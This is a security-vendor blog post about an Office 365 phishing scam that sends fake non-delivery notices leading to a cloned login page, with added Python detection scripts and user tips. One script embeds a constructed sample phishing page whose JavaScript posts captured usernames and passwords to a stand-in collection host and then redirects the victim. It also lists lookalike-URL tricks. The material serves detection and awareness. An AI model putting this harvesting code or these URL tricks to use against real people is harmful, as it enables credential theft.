
Scam of the Week: Sophisticated Phishing Scam Targets Office 365 Users


Office 365 users are the latest to be targeted with a convincing new phishing scam designed to steal their login credentials.

The scam was uncovered by security researcher Xavier Mertens as he collected data from his email honeypots. A honeypot is a decoy system that exists only to be attacked; in this case, mailboxes set up purely to receive spam and phishing, so that whatever lands in them provides valuable information on how cybercriminals operate.

The phishing email is disguised as a non-delivery notification from Office 365, informing the user that Microsoft has detected several undelivered messages on their account. It then prompts the recipient to click on the ‘send again’ link to resend the emails.

Image: Office 365 Phishing Email (Source: Internet Storm Center)


As soon as the user clicks on the link, they are taken straight to a phishing website that impersonates the legitimate Office 365 login page. The site has been set up specifically to harvest credentials and, as the image below shows, it is extremely convincing and difficult to distinguish from the official Office 365 login page.

Image: Office 365 Phishing website (Source: Internet Storm Center)


Once the victim enters their password, a JavaScript function called ‘sendmails’ sends the username and password to the criminals' server and then redirects the browser to the legitimate Office 365 login URL. The victim lands on a genuine Microsoft page and is likely to assume the first attempt simply failed, so the theft goes unnoticed.
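
What that harvest-and-redirect behaviour looks like to an analyst who has pulled the page source, as an added example that is not part of the original article and not the real kit's code: the HTML and the `sendmails` function below are a constructed sample modelled on the behaviour described, the collection host mail-update.example is invented, and the script simply reports where the form data goes and where the victim is sent afterwards.

```python
"""Triage a captured credential-harvesting page for the harvest-and-redirect pattern."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts Microsoft actually uses for Office 365 / Microsoft account sign-in.
LEGIT_LOGIN_HOSTS = ("login.microsoftonline.com", "login.live.com", "login.microsoft.com")

# Constructed sample modelled on the behaviour described in the article (not the real kit):
# the form posts nowhere, a script relays the credentials, then bounces to the real login.
SAMPLE_PAGE = """
<html><body>
<form id="login" action="#" onsubmit="return sendmails();">
  <input name="loginfmt" type="email">
  <input name="passwd" type="password">
  <input type="submit" value="Sign in">
</form>
<script>
function sendmails() {
  var data = {u: document.querySelector('[name=loginfmt]').value,
              p: document.querySelector('[name=passwd]').value};
  fetch('https://mail-update.example/collect.php', {method: 'POST', body: JSON.stringify(data)})
    .then(function () { window.location.href = 'https://login.microsoftonline.com/'; });
  return false;
}
</script>
</body></html>
"""

# Where the script sends data (fetch / XMLHttpRequest.open) and where it sends the victim afterwards.
EXFIL_RE = re.compile(r"""(?:fetch|\.open)\(\s*(?:['"](?:GET|POST)['"]\s*,\s*)?['"](https?://[^'"]+)['"]""")
REDIRECT_RE = re.compile(r"""(?:window\.|document\.)?location(?:\.href)?\s*=\s*['"](https?://[^'"]+)['"]""")


class PageScan(HTMLParser):
    """Collect form actions, whether a password field exists, and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.scripts = [], []
        self.has_password_field = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def is_legit_login_host(host):
    """True only for a Microsoft login host or a subdomain of one (not a lookalike that merely contains it)."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in LEGIT_LOGIN_HOSTS)


def triage(page_html):
    """Return the exfil and redirect hosts found in the page plus human-readable indicators."""
    scan = PageScan()
    scan.feed(page_html)
    scan.close()
    script_text = "\n".join(scan.scripts)
    exfil = sorted({urlparse(u).hostname or "" for u in EXFIL_RE.findall(script_text)})
    redirect = sorted({urlparse(u).hostname or "" for u in REDIRECT_RE.findall(script_text)})
    indicators = []
    if scan.has_password_field and not any(is_legit_login_host(urlparse(a).hostname) for a in scan.form_actions):
        indicators.append("password form does not submit to a Microsoft login host")
    for h in exfil:
        if not is_legit_login_host(h):
            indicators.append(f"script posts form data to third-party host {h}")
    if exfil and any(is_legit_login_host(h) for h in redirect):
        indicators.append("victim is redirected to the genuine login page after submission")
    return {"exfil_hosts": exfil, "redirect_hosts": redirect, "indicators": indicators}


if __name__ == "__main__":
    for line in triage(SAMPLE_PAGE)["indicators"]:
        print("RED FLAG:", line)
```

The regexes only catch URL literals written directly into the script; kits that build the collection URL from pieces or load a second-stage script will need the page rendered in an instrumented browser instead. The combination of a third-party collection host followed by a redirect to the genuine login page is the signature worth alerting on.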

The sophisticated nature of the scam highlights the extra care and vigilance users must take online. The address bar should act as a red flag, because the page is not hosted on a Microsoft login domain such as login.microsoftonline.com, but to the untrained eye the familiar branding and logos will be enough to trick them into disclosing their credentials.
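
A concrete version of that red flag, added here as an example and not part of the original article: the check below tests whether a sign-in link really resolves to one of Microsoft's login hosts and reports the tricks that make lookalike addresses convincing (brand name buried in another domain, a `name@` prefix hiding the real host, a raw IP, non-ASCII homoglyphs). The sample URLs are constructed; the hostnames in LEGIT_LOGIN_HOSTS are the ones Microsoft uses for sign-in, so extend the list if your organisation signs in through a different identity provider.

```python
"""Flag the tricks that make a fake Office 365 sign-in URL look genuine."""
from urllib.parse import urlparse

# Hosts Microsoft uses for Office 365 / Microsoft account sign-in.
LEGIT_LOGIN_HOSTS = ("login.microsoftonline.com", "login.live.com", "login.microsoft.com")
# Brand words attackers embed in domains they control, e.g. office365-login.example.
BRAND_TOKENS = ("microsoft", "office", "o365", "outlook", "sharepoint", "onedrive")


def url_red_flags(url):
    """Return the reasons a supposed Office 365 sign-in URL should not be trusted (empty list = looks genuine)."""
    url = url.strip()
    # A link with no scheme is opened as plain http by the browser, so treat it that way.
    if "://" not in url:
        url = "http://" + url
    p = urlparse(url)
    host = (p.hostname or "").lower().rstrip(".")
    flags = []
    if p.scheme != "https":
        flags.append("not served over https")
    if p.username is not None:
        # https://login.microsoftonline.com@evil.example/ really goes to evil.example
        flags.append("'name@' prefix hides the real host")
    if host.replace(".", "").isdigit():
        flags.append("raw IP address instead of a domain name")
    if not host.isascii() or "xn--" in host:
        flags.append("non-ASCII or punycode host (possible homoglyph)")
    if not any(host == d or host.endswith("." + d) for d in LEGIT_LOGIN_HOSTS):
        flags.append(f"{host!r} is not a Microsoft login host")
        if any(token in host for token in BRAND_TOKENS):
            flags.append("Microsoft branding used inside a domain Microsoft does not own")
    return flags


# Constructed sample links; only the first is genuine. 198.51.100.23 is a documentation-range address.
SAMPLE_LINKS = [
    "https://login.microsoftonline.com/common/oauth2/authorize",
    "http://login.microsoftonline.com.mail-update.example/office365/",
    "https://login.microsoftonline.com@198.51.100.23/verify",
    "https://login.micr\u043esoftonline.com/",  # Cyrillic 'о' in place of Latin 'o'
    "office365-resend.example/undelivered",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        flags = url_red_flags(link)
        print(link, "->", "OK" if not flags else "; ".join(flags))
```

Note that the check deliberately does not accept a host just because it contains "microsoftonline.com" somewhere; only an exact match or a true subdomain of the listed hosts passes, which is what defeats the login.microsoftonline.com.attacker-domain style of lookalike.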

To prevent yourself from being phished by one of the many online phishing scams, there are a number of steps you should take:

  • Never click on links or download attachments in unexpected emails, even when the branding looks right.
  • Check the address bar before entering credentials: a padlock only means the connection is encrypted, not that the site is genuine, so confirm the domain is the one you expect (for Office 365, login.microsoftonline.com).
  • Pay close attention to the sender's email address; if the domain does not match the claimed sender, delete the message.
  • Treat poor grammar, spelling or formatting as a warning sign, but do not rely on it: as this scam shows, well-crafted lures exist.
  • Reputable companies will never ask you to supply passwords or other personal information by email.
  • Use a unique password for every account, and enable multi-factor authentication where it is offered, so a stolen password alone is not enough.
  • Keep your operating system, browser and anti-virus software up to date.

Despite the increasing sophistication of phishing attacks there are a number of ways you can protect yourself online. MetaPhish has been specifically designed to protect businesses from phishing and ransomware attacks and provides the first line of defence in combating cyber-crime. Get in touch for further information on how we can help your business.
